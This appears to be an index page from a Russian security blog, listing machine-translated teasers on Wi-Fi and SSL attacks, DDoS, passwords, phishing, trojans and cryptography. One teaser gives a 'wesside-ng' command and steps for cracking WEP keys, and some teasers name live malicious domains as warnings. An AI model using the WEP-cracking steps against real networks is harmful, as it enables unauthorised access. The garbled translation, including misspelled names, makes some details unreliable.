    Attempt yet to understand what happened and what it can threaten us. Since cryptographic attack - a thing is needed to understand quite a lot of specific knowledge, the article may be considered in some ways the study of security in Wi-Fi networks.

    Well, for starters have a little stroll on the theory of cryptographic protocols, Wi-Fi. While the impatient and those who are not interested in all this is science-like casuistry, it is not forbidden to proceed immediately to a conclusion.

    WEP


    WEP protocol is currently considered obsolete, not recommended for use at all in favor of WPA and WPA2. You bet! Vulnerability of its serious enough that they allow to crack the key and connect to a secure network in minutes. How many of these very minute need, depends on the intensity of traffic on the network, the average loaded network breaks down for a minute or two (are interested in this question refer to the article and ... Читать дальше »
    Просмотров: 853 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    In parallel with the development of technologies to protect Internet traffic from unauthorized access and develop technology to intercept protected traffic. Intercept and study the unencrypted user's traffic no longer is easy, even for the average user. Almost everyone knows the word "sniffer". Theoretically protected by SSL / TSL-compound by conventional means is impossible to intercept. But is this true?

    Actually - not quite. Yes, the encrypted traffic is theoretically impossible to decipher, although again in theory at very high need and desire, and this traffic can be decrypted, pick up the keys. However, this requires such costs of resources that the urgency of breaking stored only, perhaps, at the governmental or military level:)

    When using a secure connection (very simple example - HTTPS) all traffic between communication points in the network is encrypted on the sender side and decrypted on the recipient side. Encrypted traffic going in both directions. In order t ... Читать дальше »
    Просмотров: 629 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Hello habrachitatel. Today I decided to share with you my thoughts about DDoS-attacks. What is it I'm not going to tell you - this is now knows, in my opinion, even a schoolboy. In general, reflecting once again the mighty attack thugs on one of my resources, I thought, but did not offer me a community of educated people, a number of ideas to fight one of the most common methods of attacks - HTTP - flooding.

    The essence of this attack is as follows - compromised computers controlled by the parent servers generate a lot of queries of the form:

    "GET / HTTP/1.1" XXX XXXX "

    Queries naturally can be any existing page as a uke resource, and do not exist. And depending on the "education" botnet and its owners, the attack can go to several URL, and depending on what the administrators of the attacked resources also change the tactics of attacks.


    Track this attack is quite simple - it is clearly seen in the "online" - viewing the web-server logs. But to reflect ... Читать дальше »
    Просмотров: 596 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Users do not like to strain and many developers put up with it. Remember the last 10 sites on which you are registered, many of them to check your password on the complexity? But no matter what security measures do not come up with the creators of the system, they may be meaningless if the user can facilitate the work of an attacker.

    In this article the results of the analysis of ~ 100 000 passwords. I hope this analysis will be interesting and useful to many habralyudyam.

    A little digression

    No, we do not store passwords in clear text, statistics obtained during the experiment at one of the social networks, through an anonymous data collection and alas, I can not put the resulting dictionary and call this network.

    What

    All passwords are checked against the criteria of the presence of digits, special characters, register and sustainability through practices cracklib.

    Data

    The distribution of the length
    < ... Читать дальше »
    Просмотров: 1894 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    In addition to the post: A new attack on unclassified flaw in the browser, IE

    0-day-called exploits those vulnerabilities that are discovered by hackers and not yet released patches or about which nothing is known the relevant security authorities of companies, whose products were found gaps.

    It turns out that "sensational" in the last days of a security hole IE7, was not eliminated in yesterday's (12/09/2008) Patch MS08-073. This means that this vulnerability is currently present in fully patched Windows XP.

    Heap (born heap) - in computer science and programming area reserved address space, the code name of a data structure over which to implement dynamic memory applications. Wikipedia
    exploit is based on a heap overflow, this attack is known as a heap overflow, affecting the XML parser browser. After installing the heap walking-code checks to see if the exploit works. For "successful" operation requires a browser exploit in IE7 and Windows XP or Windows ... Читать дальше »
    Просмотров: 578 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Currently, many online services (working with finance) is used as a confirmation of your identity a scanned copy of his passport. These services include, and billing systems, and domain registrars, and payment systems.
    Today I received an interesting letter to our corporate address (job@nashdomen.com), which is used to make a summary of the candidates of our vacancies. I quote the letter:

    Hello!
    We have reviewed your resume on the site www.rabota.ru, and you come to us completely. Since you will contact the manager to work with the staff and you will need to be interviewed. To confirm your data posted on the site www.rabota.ru and safety reasons we ask that you send us an email nefte_stroy@mail.ru photocopy the first page of the passport and a photocopy of your propiski.Polnuyu information about our company, please visit the site www.rabota.ru.
    Company LLC Neftestroy "


    Part of the header:
    Return-Path: <nefte_stroy@mail.ru>
    Delivered-To:
    Rec ... Читать дальше »
    Просмотров: 579 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    I would like to share their experiences provide content filtering means of hardware and software eSafe.

    ESafe - a proactive remedy to be installed at the gateway to the Internet, and prevents the penetration of the protected network of known and unknown malware, spam, as well as limiting access to data and applications that do not comply with corporate policy, or moral and ethical standards.

    ESafe is the development of Aladdin is now SafeNet. eSafe has 4 operating modes eSafe Mail, eSafe Web, eSafe Web & Mail and eSafe Web SSL. eSafe can work as a bridge for users it is invisible, except when there is a lock and the user sees the page locks. Page lock can be modified adjusting the code in the console, or disabled.

    Complex Pluses:
    • filtering on the fly
    • blocking applications (Skype, ICQ, XMPP, etc.) and annonimayzerov
    • virus removal and blocking communications Trojans
    • possibility of clustering
    • main network card has B ... Читать дальше »
    Просмотров: 695 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Around the beginning of November, security experts noticed an unusual behavior of botnets. They started to coordinate efforts to slow the sorting of logins and passwords to various hosts. Experts call it the "slow bruteforce", because the speed of brute force is extremely small (need to enumerate all combinations of all possible passwords for logins in the dictionary) - this process will take several years. But due to the huge number of vehicles involved in the attack, it still gradually moving - every day, hackers get a "catch." Requests go to different IP (see logs). Apparently coordinated attack from a common center (the bots have a common vocabulary for sorting options).

    So far botnets have sifted through more than half of the dictionary and came to the letter "o". Where will it end and who is behind the strange activity - not yet entirely clear. It is also unclear why the attackers did not touch the car under OpenBSD.

    One thing is clear: the recent botnet activity ha ... Читать дальше »
    Просмотров: 559 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Among the web pages that are added to the database free antivirus for sites SiteGuard, recently began to appear often enough pages that contain potentially hazardous iframe or javascript-code, nor do these codes have a common feature - they all were on different pages on a domain _google- analistyc.net_ (gently, at the moment there's just the word test, but may receive anything, why go to such sites should be disconnected from JS). Details - under habrakatom.

    For example, the page was discovered, in turn, loads the iframe with address _http: / / www.telexexchange.net / psy / _ (careful!).
    The script at this address identifies the type of browser, and displays the corresponding exploits, including Firefox and Opera. Wishing to conduct experiments on their own once again emphasize that visit this site should only be disabling JavaScript in your browser, and IE users, better to refrain from experimenting. At the time of this writing, the site has not yet appeared in a database o ... Читать дальше »
    Просмотров: 709 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    At the present time, the protection of personal data is one of the most pressing problems for the majority of commercial and governmental organizations. Information systems should be brought into compliance with the requirements of the Federal Law "On Personal Data" not later than July 1 2011.

    I plan to write a series of articles on common methods of protection of personal data that can help your company reduce costs for some services to companies involved in data protection, or at least understand what you are paying. All that we have experienced in their own company.

    According to the results of all actions that will be described, we have successfully received your certificate of compliance with the requirements of the Federal Law ISPDn and saved about 45000r. on the services of integrators (12 AWP + server).

    Survey ISPDn

    Building a security information system of personal data (ISPDn) begins with a survey ISPDn, its classification and compila ... Читать дальше »
    Просмотров: 834 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Does not that remove a favorite stick a bunch of harmful elements, and after each connect to someone else's computer, a burden? And how many nerve cells destroy these items? My - nemeryannom!

    All that I know how to combat such incidents (such as: change seats on Linux, disable autorun, do not poke the stick at random, etc.) are not acceptable to me. Therefore had to invent her.

    Surely someone this method may seem ineffective, someone - uncomfortable. And someone will sigh with relief or even help less-experienced friends.

    I should note that, on a secure flash drive this way, will be hampered operations on elements of the root folder. It is based on this method.

    The bottom line: to forbid anyone else write / change the root directory.
    Result: all the evil that hit the stick, nothing can stop you.


    The first thing to do - to organize on a flash drive NTFS-partition. How to do it? Google will tell you all the details and poses. I will point out the ... Читать дальше »
    Просмотров: 559 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Market owns the one who owns the information! Paul Gates

    Starting with this article, I will try to dismantle a number of issues relating to security firms.

    Question 1: trade secrets? What is it and what does it do?

    In accordance with Civil Code st.139 trade secrets - that is, information that has actual or potential commercial value by virtue of being unknown to third parties, there is no free access to the lawful owner of the information and take measures to protect its confidentiality.

    I think that many readers have their Habra large, medium and small firms. Therefore, it seemed useful to talk about how important it is for what and how to protect information in the firm. The notion of information, I mean not only what is stored in a computer, and this concept includes such things as:
    information about customers, contractors, suppliers, customers, consumers, customers, partners, funders, intermediaries and other partners business relationsh ... Читать дальше »
    Просмотров: 574 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    All have heard about asymmetric cryptography, but I certainly do not all know what it is and what is it they eat.

    Let's try to understand this as an example of the algorithm RSA.

    The RSA algorithm is at the origins of cryptography was proposed by three researchers-mathematicians Ronald Rivet-Stom (R. Rivest), Adi Shamir (A. Shamir) and Leonard Adlmanom (LAdleman) in 1977-78, respectively.

    Any asymmetric encryption requires a key pair, namely open and closed. Why should they?




    The above is a scheme of interaction of objects in assimetrishnoy encryption system. Generator gives us a couple of key open ([Ea, N]) and closed ([Da, N]), is transmitted to the subscriber's public key which encrypts a message and sends the encrypted message (Ea (DATA)) receiver to decode the private key ([Da, N ]) and gets the original message.

    The RSA algorithm is based on the unilateral use of encryption functions which have the property:
    Просмотров: 765 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    The new software package iWork '09 for Mac, presented at MacWorld 2009, literally on the same day appeared on a torrent. Naturally, it was a pirated version, but the fun lies elsewhere. Popular software package for MacOS was the "makeweight" in the form of Trojan OSX.Trojan.iServices.A. According to experts from the company Intego, infected approximately 20,000 computers.

    Trojan registers in autostart and receive full rights, so that it can install additional malicious code and modify the installed applications.

    The good news is that, in itself a Trojan does not spread, you can install it only with a pirate copy of iWork '09. So beware!

    UPD: found a news item in which comrade argues that caught pumped trial version from a torrent tracker instead of the official site. We also give some details on the symptoms.

    UPD 2: How to find and fight (thanks ilmarinen)
    1. Before you install iWork '09 ch ... Читать дальше »
    Просмотров: 560 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Right now, with incredible speed to Skype sent out a viral file "YOUR-MOTHER-NAKED-hahahaha.pif". If you are neostorozhennosti it opened, it automatically sent to all users in your contact list.
    Here are the steps that will help remove the infection:
    1) Restart your computer and go to mode Safe Mode (F8 when downloading)
    2) Login under the account in which the virus was picked up
    3) Open Task Manager (Ctrl + Alt + Del) and check whether the process is not running winservice (if Yes, kill him).
    4) You need to erase the very zloschastny file that you took on skype - YOUR-MOTHER-NAKED-hahahaha.pif
    5) Clean the Temp directory (Windows Vista: C : \ Users \% username% \ AppData \ Local \ Temp and Windows XP: C: \ Documents and Settings \% username% \ Local Settings \ Temp)
    6 ) Clean Recycle Bin (if the files are not removed through the Shift + Delete)
    7) Sign into ... Читать дальше »
    Просмотров: 565 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    I - a man (as strange as it may sound) as well as all of you.
    I am - I leave your information on the Internete, and do not want that to me knew more than I can write about myself in the same Facebooke.

    once released on Radarix I looked, laughed and went out. The second time I got there, I was very puzzled. Punched themselves, their relatives, yes - all the information converges.



    Once it became clear that we must somehow fight. Wrote them into the caliper, they say, a fig. As expected, the response - has not followed. His head flashed a lot of thoughts, but they all seemed delusional. How then I met Habre tops with letters to the president. Of course, that I once did - is understandable. I wrote this letter. (Unfortunately, what I wrote - I do not remember. But what is in the spirit of why the government does not shoots such resources.)

    Where then two weeks later, on December 17, I received a letter that said my call was directed to consider ... Читать дальше »
    Просмотров: 704 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    This is a continuation of the previous article, "Attacks on wireless access points with WEP-protected.

    In the second part series of articles on wireless security, we look at some unconventional attacks on WEP.


    In the latest (unstable) version of aircrack-ng added a few programs that implement new attacks on the WEP protocol.

    The first of them - wesside-ng. In fact - it is a script that automates the hack key. The program has several options, but for you simply give her the name of the network interface to use:

    wesside-ng-i wlan0

    The algorithm works the same as for manual hacking:

    1. Skipping through the channels found a network with WEP.

    2. Produced fake authentication. If filtering is enabled on the MAC - changed to a valid address of the adapter.

    3. Authentication is made.

    4. Fragmentation attack produces 128 bits klyuchegogo flow.

    5. Catch ARP-packet, IP address in the body stands. Based on th ... Читать дальше »
    Просмотров: 580 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)



    True, the word "passport" appears only in the official explanations about the project, its working title «Identity Ecosystem», and the official «National Strategy for Trusted Identities in Cyberspace». Naturally, the public immediately thought of the notorious "Big Brother" from "1984". In the "ideal society", the state very well interact with the public, knowing all and everything about each through identification system. What is the official goal of developing a web-passports? Officials say the project aims to improve the safety of its citizens on the web.

    For example, Secretary of U.S. Department of Commerce Gary Locke speaks of "strengthening the security of the web, improving confidentiality and improve the system of authorization to different resources, so users will not need to memorize dozens or hundreds of passwords. Locke argues that thanks to the Internet passports, perhaps, the old authentication system via cords "password / username" will be completely disca ... Читать дальше »
    Просмотров: 575 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)

    Two of my friends, set in during the week of questions about the same in essence (some in spirit: "And I heard that MD5/SHA-1 been hacked, why do we still use them?") have prompted me to write this article, although the main events described below, there were already more than 3 years ago.

    General information (experts - to pass without a doubt)


    As you know, cryptographic hash sums differ from usual hash-sums that in addition to the basic properties required of any hash Functions:
    • ability to convert the input value (usually text) of any length in the output value of fixed length,
    • statistical uniformity of falling output values ??
    • good "dispersion" (the difference is approximately half of the bit) output values ??even for small (perhaps only a bit) different input texts;
    to cryptographic hash algorithms additional requirements:
    Просмотров: 596 | Добавил: w1zard | Дата: 15.03.2011 | Комментарии (0)